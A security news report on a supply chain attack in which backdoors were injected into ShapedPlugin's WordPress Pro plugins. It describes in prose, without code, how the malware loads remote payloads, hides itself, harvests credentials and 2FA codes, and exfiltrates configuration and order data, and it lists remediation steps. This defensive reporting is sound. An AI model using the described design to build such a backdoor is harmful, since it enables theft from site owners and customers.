Multiple WordPress plugins from ShapedPlugin have been compromised in a supply chain attack after unknown threat actors gained access to the vendor’s build and distribution pipeline and injected backdoor functionality into official Pro releases. Security researchers at Wordfence report that the attackers were able to tamper with the legitimate update mechanism itself, meaning customers received malicious code through trusted, signed distribution channels rather than external downloads.
The incident impacts several premium plugins, including Product Slider Pro for WooCommerce (versions prior to 3.5.4), Real Testimonials Pro (version 3.2.5), and Smart Post Show Pro (versions before 4.0.2). While the scope is limited to Pro editions delivered via ShapedPlugin’s Easy Digital Downloads infrastructure, the compromise is particularly significant because the free versions distributed through WordPress.org remain unaffected, potentially creating a false sense of safety among users who rely on official update systems.
Once installed, the compromised plugins deploy a loader that runs on every WordPress admin page. This component reaches out to a remote server to retrieve additional payloads, installs them locally, and activates them as a hidden plugin designed to blend into the environment. The malware then reports the infected site back to the attacker’s infrastructure, erases installation traces to hinder detection, and conceals itself from the WordPress plugin interface. From there, it enables credential harvesting, including plaintext administrative logins and two-factor authentication codes, while also establishing persistence through a custom REST API endpoint that can be used to execute arbitrary file writes or deploy a web shell.
Beyond access persistence, the malicious code includes a PHP component (“install-persistent.php”) capable of extracting highly sensitive system and business data, including full WordPress configuration files with database credentials and authentication keys, lists of administrator accounts with creation timestamps, SMTP credentials from popular mail plugins, and up to three months of WooCommerce order data with payment details. The file is deleted after execution, further complicating forensic analysis. Researchers believe the attack is consistent with a compromised build pipeline rather than direct package poisoning, highlighting a serious breakdown in software supply chain integrity.
The issue has been assigned CVE-2026-49777 (CVSS 10.0) and CVE-2026-10735 (CVSS 9.8), reflecting its maximum severity and systemic impact. ShapedPlugin has acknowledged the incident and says it is auditing its build and release processes before issuing clean updates. Administrators using affected plugins are advised to assume compromise, rotate all credentials, revoke and regenerate 2FA secrets, review administrator accounts for unauthorized changes, and verify SMTP and plugin configurations for tampering.
